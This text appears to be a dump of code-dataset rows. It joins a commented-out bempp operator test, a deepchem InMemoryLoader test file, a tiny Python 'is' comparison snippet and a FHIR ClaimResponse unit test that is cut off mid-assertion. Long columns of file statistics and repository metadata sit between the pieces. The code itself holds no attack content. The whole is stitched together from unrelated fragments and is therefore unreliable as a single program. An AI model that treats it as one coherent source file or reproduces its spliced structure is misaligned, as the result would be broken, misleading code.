# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import hypersingular
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = hypersingular(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = hypersingular(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
| 25.647619
| 85
| 0.693526
| 912
| 8,079
| 5.884868
| 0.10307
| 0.089435
| 0.089435
| 0.044718
| 0.935905
| 0.929942
| 0.921185
| 0.921185
| 0.921185
| 0.912055
| 0
| 0.006187
| 0.199777
| 8,079
| 314
| 86
| 25.729299
| 0.823975
| 0.509345
| 0
| 0.708333
| 0
| 0
| 0.06843
| 0.047441
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.041667
| false
| 0
| 0.104167
| 0
| 0.145833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87ce68122b9f404081e0df04ae6022f0dcf9d582
| 2,182
|
py
|
Python
|
deepchem/data/tests/test_inmemory.py
|
cjgalvin/deepchem
|
64993a129e7f0f78fed9500298b1828ac8a0757a
|
[
"MIT"
] | 3,782
|
2016-02-21T03:53:11.000Z
|
2022-03-31T16:10:26.000Z
|
deepchem/data/tests/test_inmemory.py
|
cjgalvin/deepchem
|
64993a129e7f0f78fed9500298b1828ac8a0757a
|
[
"MIT"
] | 2,666
|
2016-02-11T01:54:54.000Z
|
2022-03-31T11:14:33.000Z
|
deepchem/data/tests/test_inmemory.py
|
cjgalvin/deepchem
|
64993a129e7f0f78fed9500298b1828ac8a0757a
|
[
"MIT"
] | 1,597
|
2016-02-21T03:10:08.000Z
|
2022-03-30T13:21:28.000Z
|
import deepchem as dc
import numpy as np
def test_inmemory_features():
smiles = ["C", "CC", "CCC", "CCCC"]
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(smiles, shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert dataset.get_number_shards() == 2
assert (dataset.ids == np.arange(4)).all()
def test_inmemory_features_and_labels():
smiles = ["C", "CC", "CCC", "CCCC"]
labels = [1, 0, 1, 0]
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(zip(smiles, labels), shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert (dataset.y == np.array(labels)).all()
assert dataset.get_number_shards() == 2
assert (dataset.ids == np.arange(4)).all()
def test_inmemory_features_and_labels_and_weights():
smiles = ["C", "CC", "CCC", "CCCC"]
labels = [1, 0, 1, 0]
weights = [1.5, 1.5, 1, 1]
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(zip(smiles, labels, weights), shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert (dataset.y == np.array(labels)).all()
assert (dataset.w == np.array(weights)).all()
assert (dataset.ids == np.arange(4)).all()
assert dataset.get_number_shards() == 2
def test_inmemory_features_and_labels_and_weights_and_ids():
smiles = ["C", "CC", "CCC", "CCCC"]
labels = [1, 0, 1, 0]
weights = [1.5, 1.5, 1, 1]
ids = smiles
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(
zip(smiles, labels, weights, ids), shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert (dataset.y == np.array(labels)).all()
assert (dataset.w == np.array(weights)).all()
assert (dataset.ids == np.array(ids)).all()
assert dataset.get_number_shards() == 2
| 36.983051
| 77
| 0.68561
| 311
| 2,182
| 4.694534
| 0.160772
| 0.15137
| 0.076712
| 0.063014
| 0.939726
| 0.928767
| 0.928767
| 0.880137
| 0.844521
| 0.844521
| 0
| 0.042246
| 0.142988
| 2,182
| 58
| 78
| 37.62069
| 0.738503
| 0
| 0
| 0.74
| 0
| 0
| 0.027498
| 0
| 0
| 0
| 0
| 0
| 0.42
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.12
| 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
87ee25c8134127b48930a2f68c6695139c16ae12
| 39
|
py
|
Python
|
AUG09/03.py
|
Razdeep/PythonSnippets
|
76f9313894f511c487a99bc38bdf0fe5e594caf5
|
[
"MIT"
] | null | null | null |
AUG09/03.py
|
Razdeep/PythonSnippets
|
76f9313894f511c487a99bc38bdf0fe5e594caf5
|
[
"MIT"
] | null | null | null |
AUG09/03.py
|
Razdeep/PythonSnippets
|
76f9313894f511c487a99bc38bdf0fe5e594caf5
|
[
"MIT"
] | null | null | null |
x=2
y=5
print(x is y)
print(x is not y)
| 9.75
| 17
| 0.641026
| 13
| 39
| 1.923077
| 0.538462
| 0.48
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 0.205128
| 39
| 4
| 17
| 9.75
| 0.741935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
35501e543bebd7cf73f33f207e1814aa35391528
| 34,684
|
py
|
Python
|
fhirclient/models/claimresponse_tests.py
|
carolinarsm/client-py
|
db1b6e3e28036dee11da75412003c7d90e591c6d
|
[
"Apache-2.0"
] | 418
|
2015-07-01T08:23:16.000Z
|
2022-03-31T14:02:30.000Z
|
fhirclient/models/claimresponse_tests.py
|
carolinarsm/client-py
|
db1b6e3e28036dee11da75412003c7d90e591c6d
|
[
"Apache-2.0"
] | 312
|
2017-09-08T15:42:13.000Z
|
2022-03-23T18:21:40.000Z
|
fhirclient/models/claimresponse_tests.py
|
carolinarsm/client-py
|
db1b6e3e28036dee11da75412003c7d90e591c6d
|
[
"Apache-2.0"
] | 185
|
2015-03-30T20:23:16.000Z
|
2022-03-30T14:39:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b on 2019-05-07.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import claimresponse
from .fhirdate import FHIRDate
class ClaimResponseTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("ClaimResponse", js["resourceType"])
return claimresponse.ClaimResponse(js)
def testClaimResponse1(self):
inst = self.instantiate_from("claimresponse-example-unsolicited-preauth.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse1(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse1(inst2)
def implClaimResponse1(self, inst):
self.assertEqual(inst.addItem[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[0].amount.value, 250.0)
self.assertEqual(inst.addItem[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[1].amount.value, 10.0)
self.assertEqual(inst.addItem[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.addItem[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[0].adjudication[2].value, 100.0)
self.assertEqual(inst.addItem[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[3].amount.value, 240.0)
self.assertEqual(inst.addItem[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[0].itemSequence[0], 1)
self.assertEqual(inst.addItem[0].modifier[0].coding[0].code, "x")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].display, "None")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].system, "http://example.org/fhir/modifiers")
self.assertEqual(inst.addItem[0].net.currency, "USD")
self.assertEqual(inst.addItem[0].net.value, 250.0)
self.assertEqual(inst.addItem[0].noteNumber[0], 101)
self.assertEqual(inst.addItem[0].productOrService.coding[0].code, "1101")
self.assertEqual(inst.addItem[0].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.addItem[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[0].amount.value, 800.0)
self.assertEqual(inst.addItem[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[1].adjudication[1].value, 100.0)
self.assertEqual(inst.addItem[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[2].amount.value, 800.0)
self.assertEqual(inst.addItem[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[1].itemSequence[0], 1)
self.assertEqual(inst.addItem[1].net.currency, "USD")
self.assertEqual(inst.addItem[1].net.value, 800.0)
self.assertEqual(inst.addItem[1].productOrService.coding[0].code, "2101")
self.assertEqual(inst.addItem[1].productOrService.coding[0].display, "Radiograph, series (12)")
self.assertEqual(inst.addItem[1].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "The enclosed services are authorized for your provision within 30 days of this notice.")
self.assertEqual(inst.id, "UR3503")
self.assertEqual(inst.identifier[0].system, "http://www.SocialBenefitsInc.com/fhir/ClaimResponse")
self.assertEqual(inst.identifier[0].value, "UR3503")
self.assertTrue(inst.insurance[0].focal)
self.assertEqual(inst.insurance[0].sequence, 1)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.preAuthRef, "18SS12345")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 101)
self.assertEqual(inst.processNote[0].text, "Please submit a Pre-Authorization request if a more extensive examination or urgent services are required.")
self.assertEqual(inst.processNote[0].type, "print")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A sample unsolicited pre-authorization response which authorizes basic dental services to be performed for a patient.</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 1050.0)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 1040.0)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "preauthorization")
def testClaimResponse2(self):
inst = self.instantiate_from("claimresponse-example-additem.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse2(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse2(inst2)
def implClaimResponse2(self, inst):
self.assertEqual(inst.addItem[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[0].amount.value, 100.0)
self.assertEqual(inst.addItem[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[1].amount.value, 10.0)
self.assertEqual(inst.addItem[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.addItem[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[0].adjudication[2].value, 80.0)
self.assertEqual(inst.addItem[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[3].amount.value, 72.0)
self.assertEqual(inst.addItem[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[0].adjudication[3].reason.coding[0].code, "ar002")
self.assertEqual(inst.addItem[0].adjudication[3].reason.coding[0].display, "Plan Limit Reached")
self.assertEqual(inst.addItem[0].adjudication[3].reason.coding[0].system, "http://terminology.hl7.org/CodeSystem/adjudication-reason")
self.assertEqual(inst.addItem[0].itemSequence[0], 1)
self.assertEqual(inst.addItem[0].modifier[0].coding[0].code, "x")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].display, "None")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].system, "http://example.org/fhir/modifiers")
self.assertEqual(inst.addItem[0].net.currency, "USD")
self.assertEqual(inst.addItem[0].net.value, 135.57)
self.assertEqual(inst.addItem[0].noteNumber[0], 101)
self.assertEqual(inst.addItem[0].productOrService.coding[0].code, "1101")
self.assertEqual(inst.addItem[0].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.addItem[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[0].amount.value, 35.57)
self.assertEqual(inst.addItem[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[1].adjudication[1].value, 80.0)
self.assertEqual(inst.addItem[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[2].amount.value, 28.47)
self.assertEqual(inst.addItem[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[1].itemSequence[0], 1)
self.assertEqual(inst.addItem[1].net.currency, "USD")
self.assertEqual(inst.addItem[1].net.value, 35.57)
self.assertEqual(inst.addItem[1].productOrService.coding[0].code, "2141")
self.assertEqual(inst.addItem[1].productOrService.coding[0].display, "Radiograph, bytewing")
self.assertEqual(inst.addItem[1].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.addItem[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[2].adjudication[0].amount.value, 350.0)
self.assertEqual(inst.addItem[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[2].adjudication[1].value, 80.0)
self.assertEqual(inst.addItem[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.addItem[2].adjudication[2].amount.value, 270.0)
self.assertEqual(inst.addItem[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[2].detailSequence[0], 2)
self.assertEqual(inst.addItem[2].itemSequence[0], 3)
self.assertEqual(inst.addItem[2].modifier[0].coding[0].code, "x")
self.assertEqual(inst.addItem[2].modifier[0].coding[0].display, "None")
self.assertEqual(inst.addItem[2].modifier[0].coding[0].system, "http://example.org/fhir/modifiers")
self.assertEqual(inst.addItem[2].net.currency, "USD")
self.assertEqual(inst.addItem[2].net.value, 350.0)
self.assertEqual(inst.addItem[2].noteNumber[0], 101)
self.assertEqual(inst.addItem[2].productOrService.coding[0].code, "expense")
self.assertEqual(inst.addItem[2].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim settled as per contract.")
self.assertEqual(inst.id, "R3503")
self.assertEqual(inst.identifier[0].system, "http://www.BenefitsInc.com/fhir/remittance")
self.assertEqual(inst.identifier[0].value, "R3503")
self.assertEqual(inst.item[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[0].amount.value, 0.0)
self.assertEqual(inst.item[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[1].amount.value, 0.0)
self.assertEqual(inst.item[0].adjudication[1].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].itemSequence, 1)
self.assertEqual(inst.item[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[1].adjudication[0].amount.value, 105.0)
self.assertEqual(inst.item[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[1].adjudication[1].value, 80.0)
self.assertEqual(inst.item[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[1].adjudication[2].amount.value, 84.0)
self.assertEqual(inst.item[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[1].itemSequence, 2)
self.assertEqual(inst.item[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[2].adjudication[0].amount.value, 750.0)
self.assertEqual(inst.item[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[2].adjudication[1].value, 80.0)
self.assertEqual(inst.item[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[2].adjudication[2].amount.value, 600.0)
self.assertEqual(inst.item[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[2].detail[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[0].adjudication[0].amount.value, 750.0)
self.assertEqual(inst.item[2].detail[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[2].detail[0].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[2].detail[0].adjudication[1].value, 80.0)
self.assertEqual(inst.item[2].detail[0].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[0].adjudication[2].amount.value, 600.0)
self.assertEqual(inst.item[2].detail[0].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[2].detail[0].detailSequence, 1)
self.assertEqual(inst.item[2].detail[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[1].adjudication[0].amount.value, 0.0)
self.assertEqual(inst.item[2].detail[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[2].detail[1].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[1].adjudication[1].amount.value, 0.0)
self.assertEqual(inst.item[2].detail[1].adjudication[1].category.coding[0].code, "benefit")
self.assertEqual(inst.item[2].detail[1].detailSequence, 2)
self.assertEqual(inst.item[2].itemSequence, 3)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.payment.amount.currency, "USD")
self.assertEqual(inst.payment.amount.value, 100.47)
self.assertEqual(inst.payment.date.date, FHIRDate("2014-08-31").date)
self.assertEqual(inst.payment.date.as_json(), "2014-08-31")
self.assertEqual(inst.payment.identifier.system, "http://www.BenefitsInc.com/fhir/paymentidentifier")
self.assertEqual(inst.payment.identifier.value, "201408-2-15507")
self.assertEqual(inst.payment.type.coding[0].code, "complete")
self.assertEqual(inst.payment.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-paymenttype")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 101)
self.assertEqual(inst.processNote[0].text, "Package codes are not permitted. Codes replaced by Insurer.")
self.assertEqual(inst.processNote[0].type, "print")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse to Claim Oral Average with additional items</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 1340.57)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 1054.47)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
def testClaimResponse3(self):
inst = self.instantiate_from("claimresponse-example.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse3(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse3(inst2)
def implClaimResponse3(self, inst):
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim settled as per contract.")
self.assertEqual(inst.id, "R3500")
self.assertEqual(inst.identifier[0].system, "http://www.BenefitsInc.com/fhir/remittance")
self.assertEqual(inst.identifier[0].value, "R3500")
self.assertEqual(inst.item[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[0].amount.value, 135.57)
self.assertEqual(inst.item[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[1].amount.value, 10.0)
self.assertEqual(inst.item[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.item[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].adjudication[2].value, 80.0)
self.assertEqual(inst.item[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[3].amount.value, 90.47)
self.assertEqual(inst.item[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].adjudication[3].reason.coding[0].code, "ar002")
self.assertEqual(inst.item[0].adjudication[3].reason.coding[0].display, "Plan Limit Reached")
self.assertEqual(inst.item[0].adjudication[3].reason.coding[0].system, "http://terminology.hl7.org/CodeSystem/adjudication-reason")
self.assertEqual(inst.item[0].itemSequence, 1)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.payment.amount.currency, "USD")
self.assertEqual(inst.payment.amount.value, 100.47)
self.assertEqual(inst.payment.date.date, FHIRDate("2014-08-31").date)
self.assertEqual(inst.payment.date.as_json(), "2014-08-31")
self.assertEqual(inst.payment.identifier.system, "http://www.BenefitsInc.com/fhir/paymentidentifier")
self.assertEqual(inst.payment.identifier.value, "201408-2-1569478")
self.assertEqual(inst.payment.type.coding[0].code, "complete")
self.assertEqual(inst.payment.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-paymenttype")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.subType.coding[0].code, "emergency")
self.assertEqual(inst.subType.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-claimsubtype")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 135.57)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 90.47)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
def testClaimResponse4(self):
inst = self.instantiate_from("claimresponse-example-vision-3tier.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse4(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse4(inst2)
def implClaimResponse4(self, inst):
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim settled as per contract.")
self.assertEqual(inst.id, "R3502")
self.assertEqual(inst.identifier[0].system, "http://thebenefitcompany.com/claimresponse")
self.assertEqual(inst.identifier[0].value, "CR6532875367")
self.assertEqual(inst.item[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[0].amount.value, 235.4)
self.assertEqual(inst.item[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[1].amount.value, 20.0)
self.assertEqual(inst.item[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.item[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].adjudication[2].value, 80.0)
self.assertEqual(inst.item[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[3].amount.value, 172.32)
self.assertEqual(inst.item[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[0].adjudication[0].amount.value, 100.0)
self.assertEqual(inst.item[0].detail[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[0].adjudication[1].amount.value, 20.0)
self.assertEqual(inst.item[0].detail[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.item[0].detail[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[0].adjudication[2].value, 80.0)
self.assertEqual(inst.item[0].detail[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[0].adjudication[3].amount.value, 80.0)
self.assertEqual(inst.item[0].detail[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[0].detailSequence, 1)
self.assertEqual(inst.item[0].detail[0].noteNumber[0], 1)
self.assertEqual(inst.item[0].detail[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].adjudication[0].amount.value, 110.0)
self.assertEqual(inst.item[0].detail[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].adjudication[2].amount.value, 88.0)
self.assertEqual(inst.item[0].detail[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].detailSequence, 2)
self.assertEqual(inst.item[0].detail[1].noteNumber[0], 1)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[0].amount.value, 60.0)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[2].amount.value, 48.0)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].subDetail[0].noteNumber[0], 1)
